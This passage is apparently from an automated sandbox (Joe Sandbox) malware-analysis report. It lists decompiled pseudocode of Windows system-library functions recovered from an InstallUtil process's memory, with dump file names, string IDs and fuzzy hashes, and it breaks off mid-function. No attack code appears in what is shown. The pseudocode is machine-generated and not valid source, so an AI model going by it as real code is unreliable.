                      				intOrPtr _v96;
                      				intOrPtr _v100;
                      				char _v104;
                      				char _v105;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t35;
                      				char _t38;
                      				signed int _t40;
                      				signed int _t44;
                      				signed int _t52;
                      				void* _t53;
                      				void* _t55;
                      				void* _t61;
                      				intOrPtr _t62;
                      				void* _t64;
                      				signed int _t65;
                      				signed int _t66;
                      
                      				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                      				_v8 =  *0x13bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                      				_v105 = __edx;
                      				_push( &_v92);
                      				_t52 = 0;
                      				_push(0);
                      				_push(0);
                      				_push( &_v104);
                      				_push(0);
                      				_t59 = __ecx;
                      				_t55 = 2;
                      				if(E012E4120(_t55, __ecx) < 0) {
                      					_t35 = 0;
                      					L8:
                      					_pop(_t61);
                      					_pop(_t64);
                      					_pop(_t53);
                      					return E0130B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                      				}
                      				_v96 = _v100;
                      				_t38 = _v92;
                      				if(_t38 != 0) {
                      					_v104 = _t38;
                      					_v100 = _v88;
                      					_t40 = _v84;
                      				} else {
                      					_t40 = 0;
                      				}
                      				_v72 = _t40;
                      				_v68 =  &_v104;
                      				_push( &_v52);
                      				_v76 = 0x18;
                      				_push( &_v76);
                      				_v64 = 0x40;
                      				_v60 = _t52;
                      				_v56 = _t52;
                      				_t44 = E013098D0();
                      				_t62 = _v88;
                      				_t65 = _t44;
                      				if(_t62 != 0) {
                      					asm("lock xadd [edi], eax");
                      					if((_t44 | 0xffffffff) != 0) {
                      						goto L4;
                      					}
                      					_push( *((intOrPtr*)(_t62 + 4)));
                      					E013095D0();
                      					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                      					goto L4;
                      				} else {
                      					L4:
                      					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                      					if(_t65 >= 0) {
                      						_t52 = 1;
                      					} else {
                      						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                      							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                      						}
                      					}
                      					_t35 = _t52;
                      					goto L8;
                      				}
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: 96261d1e7c46bd0a838f5e75ac94881138ecc72c727819481ec4ddc75f98b723
                      • Instruction ID: 1af43cb96eb2f25d9fe40ca478b209d78bc7d6154d60c608bb6272739d1b2e60
                      • Opcode Fuzzy Hash: 96261d1e7c46bd0a838f5e75ac94881138ecc72c727819481ec4ddc75f98b723
                      • Instruction Fuzzy Hash: DF31C2B656830A9FC721DF68C981A6BFBE8EB85654F00093EFB9483251D634DD04CF92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E012D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                      				intOrPtr _v8;
                      				char _v16;
                      				intOrPtr* _t26;
                      				intOrPtr _t29;
                      				void* _t30;
                      				signed int _t31;
                      
                      				_t27 = __ecx;
                      				_t29 = __edx;
                      				_t31 = 0;
                      				_v8 = __edx;
                      				if(__edx == 0) {
                      					L18:
                      					_t30 = 0xc000000d;
                      					goto L12;
                      				} else {
                      					_t26 = _a4;
                      					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                      						goto L18;
                      					} else {
                      						E0130BB40(__ecx,  &_v16, __ecx);
                      						_push(_t26);
                      						_push(0);
                      						_push(0);
                      						_push(_t29);
                      						_push( &_v16);
                      						_t30 = E0130A9B0();
                      						if(_t30 >= 0) {
                      							_t19 =  *_t26;
                      							if( *_t26 != 0) {
                      								goto L7;
                      							} else {
                      								 *_a8 =  *_a8 & 0;
                      							}
                      						} else {
                      							if(_t30 != 0xc0000023) {
                      								L9:
                      								_push(_t26);
                      								_push( *_t26);
                      								_push(_t31);
                      								_push(_v8);
                      								_push( &_v16);
                      								_t30 = E0130A9B0();
                      								if(_t30 < 0) {
                      									L12:
                      									if(_t31 != 0) {
                      										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                      									}
                      								} else {
                      									 *_a8 = _t31;
                      								}
                      							} else {
                      								_t19 =  *_t26;
                      								if( *_t26 == 0) {
                      									_t31 = 0;
                      								} else {
                      									L7:
                      									_t31 = L012E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                      								}
                      								if(_t31 == 0) {
                      									_t30 = 0xc0000017;
                      								} else {
                      									goto L9;
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return _t30;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: WindowsExcludedProcs
                      • API String ID: 0-3583428290
                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                      • Instruction ID: 911fd948c49720e6356de2822ca6d886608cb9b185f56ad3401f3f193876cc36
                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                      • Instruction Fuzzy Hash: 9221267B620229ABDB22AA5DC840F6BBBADEF51A54F058425FE04DB600D634DC10C7A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                      				intOrPtr _t13;
                      				intOrPtr _t14;
                      				signed int _t16;
                      				signed char _t17;
                      				intOrPtr _t19;
                      				intOrPtr _t21;
                      				intOrPtr _t23;
                      				intOrPtr* _t25;
                      
                      				_t25 = _a8;
                      				_t17 = __ecx;
                      				if(_t25 == 0) {
                      					_t19 = 0xc00000f2;
                      					L8:
                      					return _t19;
                      				}
                      				if((__ecx & 0xfffffffe) != 0) {
                      					_t19 = 0xc00000ef;
                      					goto L8;
                      				}
                      				_t19 = 0;
                      				 *_t25 = 0;
                      				_t21 = 0;
                      				_t23 = "Actx ";
                      				if(__edx != 0) {
                      					if(__edx == 0xfffffffc) {
                      						L21:
                      						_t21 = 0x200;
                      						L5:
                      						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                      						 *_t25 = _t13;
                      						L6:
                      						if(_t13 == 0) {
                      							if((_t17 & 0x00000001) != 0) {
                      								 *_t25 = _t23;
                      							}
                      						}
                      						L7:
                      						goto L8;
                      					}
                      					if(__edx == 0xfffffffd) {
                      						 *_t25 = _t23;
                      						_t13 = _t23;
                      						goto L6;
                      					}
                      					_t13 =  *((intOrPtr*)(__edx + 0x10));
                      					 *_t25 = _t13;
                      					L14:
                      					if(_t21 == 0) {
                      						goto L6;
                      					}
                      					goto L5;
                      				}
                      				_t14 = _a4;
                      				if(_t14 != 0) {
                      					_t16 =  *(_t14 + 0x14) & 0x00000007;
                      					if(_t16 <= 1) {
                      						_t21 = 0x1f8;
                      						_t13 = 0;
                      						goto L14;
                      					}
                      					if(_t16 == 2) {
                      						goto L21;
                      					}
                      					if(_t16 != 4) {
                      						_t19 = 0xc00000f0;
                      						goto L7;
                      					}
                      					_t13 = 0;
                      					goto L6;
                      				} else {
                      					_t21 = 0x1f8;
                      					goto L5;
                      				}
                      			}












                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: Actx
                      • API String ID: 0-89312691
                      • Opcode ID: e144562db8c4228058358871919d79170cb605dbf1c085ff5ea9ee5d61f0bb8a
                      • Instruction ID: 364912439119a1ebe69f49c24c3f20055edd81542301393759ed51ecb537c226
                      • Opcode Fuzzy Hash: e144562db8c4228058358871919d79170cb605dbf1c085ff5ea9ee5d61f0bb8a
                      • Instruction Fuzzy Hash: FA11B6353B47038BEB2D4E1D8B9973676D6EB85624FA5452AEA65CB391D7B0C840C340
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 71%
                      			E01378DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _t35;
                      				void* _t41;
                      
                      				_t40 = __esi;
                      				_t39 = __edi;
                      				_t38 = __edx;
                      				_t35 = __ecx;
                      				_t34 = __ebx;
                      				_push(0x74);
                      				_push(0x13a0d50);
                      				E0131D0E8(__ebx, __edi, __esi);
                      				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                      				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                      				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                      					E01355720(0x65, 0, "Critical error detected %lx\n", _t35);
                      					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                      						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                      						asm("int3");
                      						 *(_t41 - 4) = 0xfffffffe;
                      					}
                      				}
                      				 *(_t41 - 4) = 1;
                      				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                      				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                      				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                      				 *((intOrPtr*)(_t41 - 0x64)) = E0131DEF0;
                      				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                      				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                      				_push(_t41 - 0x70);
                      				E0131DEF0(1, _t38);
                      				 *(_t41 - 4) = 0xfffffffe;
                      				return E0131D130(_t34, _t39, _t40);
                      			}






                      Strings
                      • Critical error detected %lx, xrefs: 01378E21
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: Critical error detected %lx
                      • API String ID: 0-802127002
                      • Opcode ID: 0f4e4b2789a56ee0c3d4bfa616734faf556dcf74f29f943d38697c9c13768747
                      • Instruction ID: 238d73d65e5f6e9f1f3cc44f1485d4fa9ce43ae0f331a0b285f32e88717324d0
                      • Opcode Fuzzy Hash: 0f4e4b2789a56ee0c3d4bfa616734faf556dcf74f29f943d38697c9c13768747
                      • Instruction Fuzzy Hash: 72115B75D15348EADF29CFA885097DCBBB0BB15359F24465DE52D6B682C3381601CF14
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E01395BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                      				signed int _t296;
                      				signed char _t298;
                      				signed int _t301;
                      				signed int _t306;
                      				signed int _t310;
                      				signed char _t311;
                      				intOrPtr _t312;
                      				signed int _t313;
                      				void* _t327;
                      				signed int _t328;
                      				intOrPtr _t329;
                      				intOrPtr _t333;
                      				signed char _t334;
                      				signed int _t336;
                      				void* _t339;
                      				signed int _t340;
                      				signed int _t356;
                      				signed int _t362;
                      				short _t367;
                      				short _t368;
                      				short _t373;
                      				signed int _t380;
                      				void* _t382;
                      				short _t385;
                      				signed short _t392;
                      				signed char _t393;
                      				signed int _t395;
                      				signed char _t397;
                      				signed int _t398;
                      				signed short _t402;
                      				void* _t406;
                      				signed int _t412;
                      				signed char _t414;
                      				signed short _t416;
                      				signed int _t421;
                      				signed char _t427;
                      				intOrPtr _t434;
                      				signed char _t435;
                      				signed int _t436;
                      				signed int _t442;
                      				signed int _t446;
                      				signed int _t447;
                      				signed int _t451;
                      				signed int _t453;
                      				signed int _t454;
                      				signed int _t455;
                      				intOrPtr _t456;
                      				intOrPtr* _t457;
                      				short _t458;
                      				signed short _t462;
                      				signed int _t469;
                      				intOrPtr* _t474;
                      				signed int _t475;
                      				signed int _t479;
                      				signed int _t480;
                      				signed int _t481;
                      				short _t485;
                      				signed int _t491;
                      				signed int* _t494;
                      				signed int _t498;
                      				signed int _t505;
                      				intOrPtr _t506;
                      				signed short _t508;
                      				signed int _t511;
                      				void* _t517;
                      				signed int _t519;
                      				signed int _t522;
                      				void* _t523;
                      				signed int _t524;
                      				void* _t528;
                      				signed int _t529;
                      
                      				_push(0xd4);
                      				_push(0x13a1178);
                      				E0131D0E8(__ebx, __edi, __esi);
                      				_t494 = __edx;
                      				 *(_t528 - 0xcc) = __edx;
                      				_t511 = __ecx;
                      				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                      				 *(_t528 - 0xbc) = __ecx;
                      				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                      				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                      				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                      				_t427 = 0;
                      				 *(_t528 - 0x74) = 0;
                      				 *(_t528 - 0x9c) = 0;
                      				 *(_t528 - 0x84) = 0;
                      				 *(_t528 - 0xac) = 0;
                      				 *(_t528 - 0x88) = 0;
                      				 *(_t528 - 0xa8) = 0;
                      				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                      				if( *(_t528 + 0x1c) <= 0x80) {
                      					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                      					if(__eflags != 0) {
                      						_t421 = E01394C56(0, __edx, __ecx, __eflags);
                      						__eflags = _t421;
                      						if(_t421 != 0) {
                      							 *((intOrPtr*)(_t528 - 4)) = 0;
                      							E0130D000(0x410);
                      							 *(_t528 - 0x18) = _t529;
                      							 *(_t528 - 0x9c) = _t529;
                      							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                      							E01395542(_t528 - 0x9c, _t528 - 0x84);
                      						}
                      					}
                      					_t435 = _t427;
                      					 *(_t528 - 0xd0) = _t435;
                      					_t474 = _t511 + 0x65;
                      					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                      					_t511 = 0x18;
                      					while(1) {
                      						 *(_t528 - 0xa0) = _t427;
                      						 *(_t528 - 0xbc) = _t427;
                      						 *(_t528 - 0x80) = _t427;
                      						 *(_t528 - 0x78) = 0x50;
                      						 *(_t528 - 0x79) = _t427;
                      						 *(_t528 - 0x7a) = _t427;
                      						 *(_t528 - 0x8c) = _t427;
                      						 *(_t528 - 0x98) = _t427;
                      						 *(_t528 - 0x90) = _t427;
                      						 *(_t528 - 0xb0) = _t427;
                      						 *(_t528 - 0xb8) = _t427;
                      						_t296 = 1 << _t435;
                      						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                      						__eflags = _t436 & _t296;
                      						if((_t436 & _t296) != 0) {
                      							goto L92;
                      						}
                      						__eflags =  *((char*)(_t474 - 1));
                      						if( *((char*)(_t474 - 1)) == 0) {
                      							goto L92;
                      						}
                      						_t301 =  *_t474;
                      						__eflags = _t494[1] - _t301;
                      						if(_t494[1] <= _t301) {
                      							L10:
                      							__eflags =  *(_t474 - 5) & 0x00000040;
                      							if(( *(_t474 - 5) & 0x00000040) == 0) {
                      								L12:
                      								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                      								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                      									goto L92;
                      								}
                      								_t442 =  *(_t474 - 0x11) & _t494[3];
                      								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                      								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                      									goto L92;
                      								}
                      								__eflags = _t442 -  *(_t474 - 0x11);
                      								if(_t442 !=  *(_t474 - 0x11)) {
                      									goto L92;
                      								}
                      								L15:
                      								_t306 =  *(_t474 + 1) & 0x000000ff;
                      								 *(_t528 - 0xc0) = _t306;
                      								 *(_t528 - 0xa4) = _t306;
                      								__eflags =  *0x13b60e8;
                      								if( *0x13b60e8 != 0) {
                      									__eflags = _t306 - 0x40;
                      									if(_t306 < 0x40) {
                      										L20:
                      										asm("lock inc dword [eax]");
                      										_t310 =  *0x13b60e8; // 0x0
                      										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                      										__eflags = _t311 & 0x00000001;
                      										if((_t311 & 0x00000001) == 0) {
                      											 *(_t528 - 0xa0) = _t311;
                      											_t475 = _t427;
                      											 *(_t528 - 0x74) = _t427;
                      											__eflags = _t475;
                      											if(_t475 != 0) {
                      												L91:
                      												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                      												goto L92;
                      											}
                      											asm("sbb edi, edi");
                      											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                      											_t511 = _t498;
                      											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                      											__eflags =  *(_t312 - 5) & 1;
                      											if(( *(_t312 - 5) & 1) != 0) {
                      												_push(_t528 - 0x98);
                      												_push(0x4c);
                      												_push(_t528 - 0x70);
                      												_push(1);
                      												_push(0xfffffffa);
                      												_t412 = E01309710();
                      												_t475 = _t427;
                      												__eflags = _t412;
                      												if(_t412 >= 0) {
                      													_t414 =  *(_t528 - 0x98) - 8;
                      													 *(_t528 - 0x98) = _t414;
                      													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                      													 *(_t528 - 0x8c) = _t416;
                      													 *(_t528 - 0x79) = 1;
                      													_t511 = (_t416 & 0x0000ffff) + _t498;
                      													__eflags = _t511;
                      												}
                      											}
                      											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                      											__eflags = _t446 & 0x00000004;
                      											if((_t446 & 0x00000004) != 0) {
                      												__eflags =  *(_t528 - 0x9c);
                      												if( *(_t528 - 0x9c) != 0) {
                      													 *(_t528 - 0x7a) = 1;
                      													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                      													__eflags = _t511;
                      												}
                      											}
                      											_t313 = 2;
                      											_t447 = _t446 & _t313;
                      											__eflags = _t447;
                      											 *(_t528 - 0xd4) = _t447;
                      											if(_t447 != 0) {
                      												_t406 = 0x10;
                      												_t511 = _t511 + _t406;
                      												__eflags = _t511;
                      											}
                      											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                      											 *(_t528 - 0x88) = _t427;
                      											__eflags =  *(_t528 + 0x1c);
                      											if( *(_t528 + 0x1c) <= 0) {
                      												L45:
                      												__eflags =  *(_t528 - 0xb0);
                      												if( *(_t528 - 0xb0) != 0) {
                      													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                      													__eflags = _t511;
                      												}
                      												__eflags = _t475;
                      												if(_t475 != 0) {
                      													asm("lock dec dword [ecx+edx*8+0x4]");
                      													goto L100;
                      												} else {
                      													_t494[3] = _t511;
                      													_t451 =  *(_t528 - 0xa0);
                      													_t427 = E01306DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                      													 *(_t528 - 0x88) = _t427;
                      													__eflags = _t427;
                      													if(_t427 == 0) {
                      														__eflags = _t511 - 0xfff8;
                      														if(_t511 <= 0xfff8) {
                      															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                      															asm("sbb ecx, ecx");
                      															__eflags = (_t451 & 0x000000e2) + 8;
                      														}
                      														asm("lock dec dword [eax+edx*8+0x4]");
                      														L100:
                      														goto L101;
                      													}
                      													_t453 =  *(_t528 - 0xa0);
                      													 *_t494 = _t453;
                      													_t494[1] = _t427;
                      													_t494[2] =  *(_t528 - 0xbc);
                      													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                      													 *_t427 =  *(_t453 + 0x24) | _t511;
                      													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                      													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                      													asm("movsd");
                      													asm("movsd");
                      													asm("movsd");
                      													asm("movsd");
                      													asm("movsd");
                      													asm("movsd");
                      													asm("movsd");
                      													asm("movsd");
                      													__eflags =  *(_t528 + 0x14);
                      													if( *(_t528 + 0x14) == 0) {
                      														__eflags =  *[fs:0x18] + 0xf50;
                      													}
                      													asm("movsd");
                      													asm("movsd");
                      													asm("movsd");
                      													asm("movsd");
                      													__eflags =  *(_t528 + 0x18);
                      													if( *(_t528 + 0x18) == 0) {
                      														_t454 =  *(_t528 - 0x80);
                      														_t479 =  *(_t528 - 0x78);
                      														_t327 = 1;
                      														__eflags = 1;
                      													} else {
                      														_t146 = _t427 + 0x50; // 0x50
                      														_t454 = _t146;
                      														 *(_t528 - 0x80) = _t454;
                      														_t382 = 0x18;
                      														 *_t454 = _t382;
                      														 *((short*)(_t454 + 2)) = 1;
                      														_t385 = 0x10;
                      														 *((short*)(_t454 + 6)) = _t385;
                      														 *(_t454 + 4) = 0;
                      														asm("movsd");
                      														asm("movsd");
                      														asm("movsd");
                      														asm("movsd");
                      														_t327 = 1;
                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                      														_t479 = 0x68;
                      														 *(_t528 - 0x78) = _t479;
                      													}
                      													__eflags =  *(_t528 - 0x79) - _t327;
                      													if( *(_t528 - 0x79) == _t327) {
                      														_t524 = _t479 + _t427;
                      														_t508 =  *(_t528 - 0x8c);
                      														 *_t524 = _t508;
                      														_t373 = 2;
                      														 *((short*)(_t524 + 2)) = _t373;
                      														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                      														 *((short*)(_t524 + 4)) = 0;
                      														_t167 = _t524 + 8; // 0x8
                      														E0130F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                      														_t529 = _t529 + 0xc;
                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                      														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                      														 *(_t528 - 0x78) = _t479;
                      														_t380 =  *(_t528 - 0x80);
                      														__eflags = _t380;
                      														if(_t380 != 0) {
                      															_t173 = _t380 + 4;
                      															 *_t173 =  *(_t380 + 4) | 1;
                      															__eflags =  *_t173;
                      														}
                      														_t454 = _t524;
                      														 *(_t528 - 0x80) = _t454;
                      														_t327 = 1;
                      														__eflags = 1;
                      													}
                      													__eflags =  *(_t528 - 0xd4);
                      													if( *(_t528 - 0xd4) == 0) {
                      														_t505 =  *(_t528 - 0x80);
                      													} else {
                      														_t505 = _t479 + _t427;
                      														_t523 = 0x10;
                      														 *_t505 = _t523;
                      														_t367 = 3;
                      														 *((short*)(_t505 + 2)) = _t367;
                      														_t368 = 4;
                      														 *((short*)(_t505 + 6)) = _t368;
                      														 *(_t505 + 4) = 0;
                      														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                      														_t327 = 1;
                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                      														_t479 = _t479 + _t523;
                      														 *(_t528 - 0x78) = _t479;
                      														__eflags = _t454;
                      														if(_t454 != 0) {
                      															_t186 = _t454 + 4;
                      															 *_t186 =  *(_t454 + 4) | 1;
                      															__eflags =  *_t186;
                      														}
                      														 *(_t528 - 0x80) = _t505;
                      													}
                      													__eflags =  *(_t528 - 0x7a) - _t327;
                      													if( *(_t528 - 0x7a) == _t327) {
                      														 *(_t528 - 0xd4) = _t479 + _t427;
                      														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                      														E0130F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                      														_t529 = _t529 + 0xc;
                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                      														_t479 =  *(_t528 - 0x78) + _t522;
                      														 *(_t528 - 0x78) = _t479;
                      														__eflags = _t505;
                      														if(_t505 != 0) {
                      															_t199 = _t505 + 4;
                      															 *_t199 =  *(_t505 + 4) | 1;
                      															__eflags =  *_t199;
                      														}
                      														_t505 =  *(_t528 - 0xd4);
                      														 *(_t528 - 0x80) = _t505;
                      													}
                      													__eflags =  *(_t528 - 0xa8);
                      													if( *(_t528 - 0xa8) != 0) {
                      														_t356 = _t479 + _t427;
                      														 *(_t528 - 0xd4) = _t356;
                      														_t462 =  *(_t528 - 0xac);
                      														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                      														_t485 = 0xc;
                      														 *((short*)(_t356 + 2)) = _t485;
                      														 *(_t356 + 6) = _t462;
                      														 *((short*)(_t356 + 4)) = 0;
                      														_t211 = _t356 + 8; // 0x9
                      														E0130F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                      														E0130FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                      														_t529 = _t529 + 0x18;
                      														_t427 =  *(_t528 - 0x88);
                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                      														_t505 =  *(_t528 - 0xd4);
                      														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                      														 *(_t528 - 0x78) = _t479;
                      														_t362 =  *(_t528 - 0x80);
                      														__eflags = _t362;
                      														if(_t362 != 0) {
                      															_t222 = _t362 + 4;
                      															 *_t222 =  *(_t362 + 4) | 1;
                      															__eflags =  *_t222;
                      														}
                      													}
                      													__eflags =  *(_t528 - 0xb0);
                      													if( *(_t528 - 0xb0) != 0) {
                      														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                      														_t458 = 0xb;
                      														 *((short*)(_t479 + _t427 + 2)) = _t458;
                      														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                      														 *((short*)(_t427 + 4 + _t479)) = 0;
                      														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                      														E0130FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                      														_t529 = _t529 + 0xc;
                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                      														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                      														 *(_t528 - 0x78) = _t479;
                      														__eflags = _t505;
                      														if(_t505 != 0) {
                      															_t241 = _t505 + 4;
                      															 *_t241 =  *(_t505 + 4) | 1;
                      															__eflags =  *_t241;
                      														}
                      													}
                      													_t328 =  *(_t528 + 0x1c);
                      													__eflags = _t328;
                      													if(_t328 == 0) {
                      														L87:
                      														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                      														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                      														_t455 =  *(_t528 - 0xdc);
                      														 *(_t427 + 0x14) = _t455;
                      														_t480 =  *(_t528 - 0xa0);
                      														_t517 = 3;
                      														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                      														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                      															asm("rdtsc");
                      															 *(_t427 + 0x3c) = _t480;
                      														} else {
                      															 *(_t427 + 0x3c) = _t455;
                      														}
                      														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                      														_t456 =  *[fs:0x18];
                      														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                      														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                      														_t427 = 0;
                      														__eflags = 0;
                      														_t511 = 0x18;
                      														goto L91;
                      													} else {
                      														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                      														__eflags = _t519;
                      														 *(_t528 - 0x8c) = _t328;
                      														do {
                      															_t506 =  *((intOrPtr*)(_t519 - 4));
                      															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                      															 *(_t528 - 0xd4) =  *(_t519 - 8);
                      															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                      															__eflags =  *(_t333 + 0x36) & 0x00004000;
                      															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                      																_t334 =  *_t519;
                      															} else {
                      																_t334 = 0;
                      															}
                      															_t336 = _t334 & 0x000000ff;
                      															__eflags = _t336;
                      															_t427 =  *(_t528 - 0x88);
